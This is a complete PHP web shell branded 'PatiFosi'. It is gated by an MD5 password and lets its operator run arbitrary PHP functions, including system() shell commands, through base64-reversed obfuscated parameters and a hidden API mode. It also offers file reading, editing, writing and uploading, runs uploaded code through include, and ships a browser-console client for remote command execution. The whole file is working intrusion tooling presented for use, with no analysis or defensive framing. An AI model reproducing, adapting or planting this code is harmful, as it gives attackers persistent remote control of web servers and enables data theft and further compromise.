<?php
error_reporting(0);
header("X-XSS-Protection: 0");
//config login
// localhost/patifosi.php?login=gans
$param = 'login';                             // login input
$pw    = 'e5e32f8c9a2e843080f5176871e8cd32'; // md5 password default = gans
$inDir = true;                             // true or false, to enable input dir
$out   = 'exit;';                         // string, not login
$enc   = true;                           // js must enabled, editor & upload not encoded
$img   = 'https://i.ibb.co/nn0TWhS/patifosi.gif';

// variable
$dirGet = $_GET['dir'];
$dirGET = $_GET['dir'];
$file   = $_GET['file'];
$func   = $_GET['func'];
$arg    = $_GET['arg'];
$mode   = $_GET['mode'];
$type   = $_GET['type'];
$pass   = $_GET[$param];
$md5    = md5("$_GET[$param]");
$host   = $_SERVER['HTTP_HOST'];
$uplto  = $_POST['uplto'];
$saveto = $_POST['saveto'];
$file   = $_POST['file'];
$sec    = $_GET['sec'];
$sc     = $_SERVER['SCRIPT_NAME'];

// decode
function dec($str){
    $str = base64_decode(strrev("$str"));
    return str_replace('=', '-', "$str");
}

if($enc == true && isset($dirGet)){
    $dirGet = dec($dirGet);
    $func   = dec($func);
    $arg    = dec($arg);
    $uplto  = dec($uplto);
    $saveto = dec($saveto);
    $file   = dec($file);
};

// login
if($md5 !== $pw){
    die("$out");
    exit;
}

// tq
$w = array("pescyte", "idbte4m", "javcode", "zerobyte", "idxSmg", "patiUndetektet", "date"=>"28 Mei 2018", "new date"=>"16 Mei 2020");
 // sorry for bad code //
// just for fun       //

// checked type
if($type){
  $typeChecked = "checked";
};

// checked iframe
if($sec){
  $cekSec = "checked";
};

// chdir
if($dirGet){
  chdir($dirGet);
};

// directory
$dirNow = getcwd();

// button encode
if($enc){
  $encButton = 'enc()';
}else{
  $encButton = '';
};

// upl dir
if($uplto){
  $uplto = $uplto;
}else{
  $uplto = $dirNow;
};

// save dir
if($saveto){
  $saveto = $saveto;
}else{
  $saveto = $dirNow;
};

// input dir
if($inDir){
  $inputDir = "<th style='display:inline-block'>dir<br><input autocomplete='off' class='encode' type='text' name='dir' value='$dirNow' placeholder='/var/www/html'> </th>";
} else {
  $Hidinput = "<input class='encode' type='hidden' name='dir' value='$dirNow'>";
};

// codemirror library in mode=edit
if($mode == edit){
  $codemirror = "
  <script src='//codemirror.net/lib/codemirror.js'></script>
  <link rel='stylesheet' href='//codemirror.net/lib/codemirror.css'>
  <script src='//codemirror.net/mode/javascript/javascript.js'></script>
  <link rel='stylesheet' href='//codemirror.net/theme/monokai.css'>
  <script src='//codemirror.net/addon/edit/matchbrackets.js'></script>
  ";
};

// ?mode=api
if($mode == api){
    $dirGet = dec($_GET['dir']);
    $func   = dec($_GET['func']);
    $arg    = dec($_GET['arg']);
    chdir($dirGet);
  if (function_exists($func)) {
        @die($func($arg));
      }else{
        echo 'failed';
      }
  exit;
}
$apiJs = "var dirNow = '$dirNow'; var func; var arg; var login = '$host$sc?$param=$pass'; var api = login+'&mode=api'; var reqDir = api+'&dir='+rev(btoa(dirNow)).replace('=', '-');

          clear();

          function dir(){
            console.log(dirNow);
          };

          function cd(a){
            dirNow = a;
            var b = rev(btoa(a)).replace('=', '-');
            reqDir = api+'&dir='+b
            console.log(dirNow);
          };

          function go(a){
          var xmlhttp = new XMLHttpRequest();
             xmlhttp.timeout = 600000;
              xmlhttp.onreadystatechange = function() {
                if (this.readyState == 4 && this.status == 200) {
                  console.log(this.responseText);
                }
              };

              xmlhttp.ontimeout = function (e) {
                console.log('time out');
            };

              xmlhttp.open('GET', a, true);
              xmlhttp.send();
          };" . '

          function clear(){
            console.clear();
            console.log("%cPatiFosi", "background:#ff6b81; color:#2f3542; font-size:30px; font-family: Arial, Helvetica, sans-serif;");
            console.log("dir()\t\t\t\t\t\/\/ show dir now\r\ncd(\"\/www\/html\/tmp\")\t\t\/\/ change dir\r\nrun(\"system\", \"ls\")\t\t\/\/ run command\r\nclear()");

          }' . "

          function run(f, n){
            f = rev(btoa(f)).replace('=', '-');
            n = rev(btoa(n)).replace('=', '-');
            l = reqDir+'&func='+f+'&arg='+n;
            go('//'+l);
          };
";


// ?mode=iframe
if($mode == iframe){
  die("<title>PatiFosi</title><link rel='icon' href='$img' type='image/gif'><iframe src='?$param=$pass&mode=command' style='position:fixed; top:0px; bottom:0px; right:0px; width: 100%; border: none; margin:0; padding:0; overflow: hidden; z-index:999999; height: 100%;'></iframe><script>function rev(str) {return str.split('').reverse().join('');}$apiJs</script>");
  exit;
}

// run code
if($_POST['run']){
    $code = $_POST['code'];

    if($_POST['tmp']){
        $tmp_file = dec($_POST['tmp']);
    }else{
        $tmp_file = tempnam(sys_get_temp_dir(), '');
    };

    if(file_put_contents("$tmp_file","$code")){
        $tmp_run = "<mark style='background: #ffffff'><a href='?$param=$pass&run=$tmp_file' target='_blank' style='color:#2ed573'> run click here</a> -> $tmp_file";
    }else{
    	$tmp_run = "<mark style='background: #ffffff'><a style='color:#ff4757'> failed saving tmp -> $tmp_file";
    };
};
if($_GET['run']){
    $runIn = $_GET['run'];
    include "$runIn";
    unlink($runIn);
    exit;
};

// header html
echo "<html>
<head>
<title>PatiFosi</title>
<link rel='icon' href='$img' type='image/gif'>
<style>
#clear { text-decoration: none; }
.shadow {
    -moz-box-shadow: 4px 5px 7px rgba(0, 0, 0,0.5);
    -webkit-box-shadow: 4px 5px 7px rgba(0, 0, 0, .5);
    box-shadow: 4px 5px 7px rgba(0, 0, 0, .5);
}
input { background-color: #ffffff; color: #2f3542; }
</style>
$codemirror
<script>
function rev(str) {
    return str.split('').reverse().join('');
}

function enc() {
    var x = document.getElementsByClassName('encode');
    var i;
    for (i = 0; i < x.length; i++) {
        x[i].value = rev(btoa(x[i].value)).replace('=', '-');
    }
}

function decFunc(){
	var i;
	var a = document.getElementById('funcList').options;
	var b = document.getElementById('funcList');
	var c = document.getElementById('func');

	for (i = 0; i < a.length; i++) {
	b.options[i].value = atob(rev(b.options[i].value).replace('-', '='));
	}
	c.setAttribute('onfocus', '')
}

function isiArg(){
	var a = document.getElementById('func').value;
	var b = document.getElementById('arg');
	var c = document.getElementById('funcList');

	if (a == c.options[0].value) {
		b.value = '123';
	} else if (a == c.options[1].value) {
		b.value = '/';
	} else if (a == c.options[5].value) {
    b.value = '.';
  } else if (a == c.options[2].value || a == c.options[3].value || a == c.options[4].value) {
		b.value = 'ls';
	} else if (a == c.options[6].value) {
		b.value = '*.html';
	} else if (a == c.options[7].value || a == c.options[8].value || a == c.options[9].value || a == c.options[10].value || a == c.options[11].value || a == c.options[13].value) {
		b.value = 'file.php';
	} else if (a == c.options[12].value) {
		b.value = 'new';
	}
}

$apiJs
</script>
</head>

<body style='padding:5%; padding-top:2%; border: 3px solid #2f3542; font-family: Arial, Helvetica, sans-serif; background:#f1f2f6;'>
  <datalist id='funcList'>
    <option value='-=wbm5WawhGc'>
    <option value='-=QZjFGcz9FbhR3b091azlGZ'>
    <option value='tVGdzl3c'>
    <option value='-UncoR3czFGc'>
    <option value='-=wYlhXZfxGblh2c'>
    <option value='-=gcpRmbhN2c'>
    <option value='-=gYvx2Z'>
    <option value='MHduVGdu92YfRXZn9VZslmZ'>
    <option value='-UGbpZGZhVmc'>
    <option value='-UGbpZ2X0h2ZpxGanlGa'>
    <option value='-=QZslmZ'>
    <option value='r5Was5Wd'>
    <option value='-IXaktWb'>
    <option value='-g2Y19Gd'>
  </datalist>
  
<center><h1 style='color:#2f3542'>PatiFosi</h1></center>
<a style='font-size:10; color:#ff4757'>$host</a>
<a style='font-size:10; color:#a4b0be'>@</a>
<a style='font-size:10; color:#2f3542'>$dirNow</a>
<a style='font-size:10; color:#ff4757' href='?$param=$pass'>[Home]</a><center>
<div style='background-color: #ff6b81'>
<a id='clear' style='color:#2f3542' href='?$param=$pass&mode=command&dir=$dirGET'>[command] - </a>
<a id='clear' style='color:#2f3542' href='?$param=$pass&mode=edit&dir=$dirGET'>[edit] - </a>
<a id='clear' style='color:#2f3542' href='?$param=$pass&mode=about&dir=$dirGET'>[about] </a>
</div>
<br><br>
";


// mode command
if ($mode == "command") {
  $arg2 = htmlspecialchars($arg, ENT_QUOTES, 'UTF-8');
  echo " <form  method='get' autocomplete='off'>
      <table id='clear' style='text-align:center'>
          <input type='hidden' name='$param' value='$pass'>
          <input type='hidden' name='mode' value='command'>
          $Hidinput
          <tr>
            <th style='display:inline-block'>iframe<br><input type='checkbox' name='sec' value='y' $cekSec> </th>
          $inputDir
            <th style='display:inline-block'>func<br><input oninput='isiArg()' id='func' onfocus='decFunc()' list='funcList'  class='encode' type='text' name='func' value='$func' placeholder='system'> </th>
            <th style='display:inline-block'>arg<br><input id='arg' class='encode' type='text' name='arg' value='$arg2' placeholder='ls'>  </th> 
            <td><br><input type='checkbox' name='type' value='checked' $typeChecked >array   <input onclick='$encButton' type='submit' value='Submit' style='background-color: #57606f;color: #f1f2f6;'>
          </td>
          </tr>
        </table>
      </form>
      </center><br>
      <pre style='background:#dfe4ea; color: #2f3542; border-right: 6px solid #ced6e0;'>";
      
          if($type == 'checked'){
          echo "<i>var_dump($func($arg));</i><br>";
			if (function_exists($func)) {
				if($sec == 'y'){
					ob_start();
					@var_dump($func($arg));
					$run = ob_get_clean();
					echo("</pre><iframe class='shadow' style='border:none'  width='100%' height='100%' src='data:text/html;base64," . base64_encode($run) . "'></iframe>");
				} else {
				@var_dump($func($arg));
				}
			}
        } else {
			if (function_exists($func)) {
					if($sec == 'y'){
					ob_start();
					echo($func($arg));
					$run = ob_get_clean();
					echo "<i>echo($func($arg));</i><br>";
					echo("</pre><iframe class='shadow' style='border:none'  width='100%' height='100%' src='data:text/html;base64," . base64_encode($run) . "'></iframe>");
				} else {
				echo "<i>die($func($arg));</i><br>";
				@die($func($arg));
				}
			}
        }


// mode edit
  } elseif ($mode == "edit") {
      $arg2 = htmlspecialchars($arg, ENT_QUOTES, 'UTF-8');
      echo "
      
      <form  method='get'>
      <table id='clear' style='text-align:center'>
          <input type='hidden' name='$param' value='$pass'>
          <input type='hidden' name='mode' value='edit'>
          $Hidinput
          <tr>
          $inputDir
            <th style='display:inline-block'>func<br><input oninput='isiArg()' id='func' onfocus='decFunc()' list='funcList'  autocomplete='off' class='encode' type='text' name='func' value='$func' placeholder='readfile'> </th>
            <th style='display:inline-block'>arg<br><input id='arg' autocomplete='off' class='encode' type='text' name='arg' value='$arg2' placeholder='file.php'>  </th> 
            <td><br><input type='checkbox' name='type' value='ob' $typeChecked>ob   <input onclick='$encButton' type='submit' value='Submit' style='background-color: #57606f;color: #f1f2f6;'>
          </td>
          </tr>
        </table>
      </form></center>
      <div align='right'>
      <button class='shadow' type='button' onclick='fullN()' style='border-radius: 50%; border: none; background-color: #eccc68; color: #f1f2f6; text-align:right'>_</button>
      <button class='shadow' type='button' onclick='full()' style='border-radius: 50%; border: none; background-color: #2ed573; color: #f1f2f6; text-align:right'>_</button>
      <button class='shadow' type='button' onclick='reset()' style='border-radius: 50%; border: none; background-color: #ff4757; color: #f1f2f6; text-align:right'>_</button>
      <br></div>
      <form  method='post' action='?$param=$pass&mode=edit&dir=$dirGET&type=$type' enctype='multipart/form-data'>
      <div class='shadow'><textarea id='codemirror' name='code' style='width:100%; height: 50%;'>";
   // codemirror
      if(!empty($_GET['func']) && !empty($_GET['arg'])){
        if($_GET['type'] !== 'ob'){
          echo(htmlspecialchars($func($arg)));
        } else {
          ob_start();
          htmlspecialchars($func($arg));
          $run = ob_get_clean();
          echo(htmlspecialchars($run));
        };
      }elseif($_POST['code']){
        echo(htmlspecialchars($_POST['code']));
      };

      echo "</textarea></div><br><input type='hidden' name='tmp' class='encode' value='$tmp_file'><input onclick='$encButton' type='submit' name='run' value='run >>' style='background-color: #747d8c;color: #f1f2f6; float: right;'>

    <table style='width:100%'>
    <tr style='text-align:center'>
    <th style='display:inline-block; padding-right:10%; padding-left:10%;'>upload<br><input autocomplete='off' class='encode' type='text' name='uplto' value='$uplto' placeholder='$dirNow'><br><input type='file' name='datupload' style='border: 1px solid #dfe4ea; background:#f1f2f6;'><br><input onclick='$encButton' type='submit' name='uploadsubmit' value='upload' style='background-color: #57606f;color: #f1f2f6;'>
    </th>
    <th style='display:inline-block; padding-left:10%; padding-right:10%;'>save<br><input autocomplete='off' class='encode' type='text' name='saveto' value='$saveto' placeholder='$dirNow'><br><input autocomplete='off' class='encode' type='text' name='file' value='$file' placeholder='file.php'><br><input onclick='$encButton' type='submit' name='savesubmit' value='save' style='background-color: #57606f;color: #f1f2f6;'>
    </form></th>
    </tr>
    </table>
    <script>
        var myCodeMirror = CodeMirror.fromTextArea(document.getElementById('codemirror'), {
            theme: 'monokai',
            lineNumbers: true,
            matchBrackets: true,
            mode: 'javascript',
            viewportMargin: false,
        });

        function full(){
          myCodeMirror.setSize('100%', '100%');
        }

        function fullN(){
          myCodeMirror.setSize('100%', '60%');
        }

        function reset() {
            var txt;
            if (confirm('Ar u sure wanna reset d code?')) {
                myCodeMirror.setValue('');
            }
        }
    </script>
    ";
    echo "<center><hr style='border-top: 1px solid #dfe4ea' width='90%'><h4>";
    if(isset($_POST['savesubmit'])){
      if(!chdir($saveto)){
        die("<mark style='background: #ffffff'><a style='color:#ff4757'> directory not exist -> $saveto");
      };

      $fpc = 'file_p' . 'ut_contents';
      $write = $fpc($file, $_POST['code']);
		  if($write) {
			  die("<mark style='background: #ffffff'><a style='color:#2ed573'> saved -> $file");
		  } else {
			  die("<mark style='background: #ffffff'><a style='color:#ff4757'> failed save -> $file");
      }

    } elseif(isset($_POST['uploadsubmit'])){
      if(!chdir($uplto)){
        die("<mark style='background: #ffffff'><a style='color:#ff4757'> directory not exist -> $uplto");
      };

      $uploadname = $_FILES['datupload']['name'];
      $uploadtmp = $_FILES['datupload']['tmp_name'];
      $write = copy($uploadtmp, $uploadname);
      if($write) {
			  die("<mark style='background: #ffffff'><a style='color:#2ed573'> uploaded -> $uploadname");
		  } else {
			  die("<mark style='background: #ffffff'><a style='color:#ff4757'> failed upload -> $uploadname");
		  }
    } elseif($tmp_run){
        die("$tmp_run");
    };


// mode about
  } elseif ($mode == "about") {
    echo '</center><pre style="background:#dfe4ea; color: #2f3542; border-right: 6px solid #ced6e0;"><i>var_dump($w);</i><br>';
    echo var_dump($w);
  } else {
      echo "<img src='$img'><br>what ar u doin?<br>dont forget to open <b>console.log<b><br><br><a style='font-size:10; color:#ff4757' href='?$param=$pass&mode=iframe'>[Go to iframe mode]</a>
      <noscript><i>javascript isn't running</i></noscript><script>
      if(!navigator.onLine) {
        alert('u must connect internet for best experience');
      }
      </script>";
};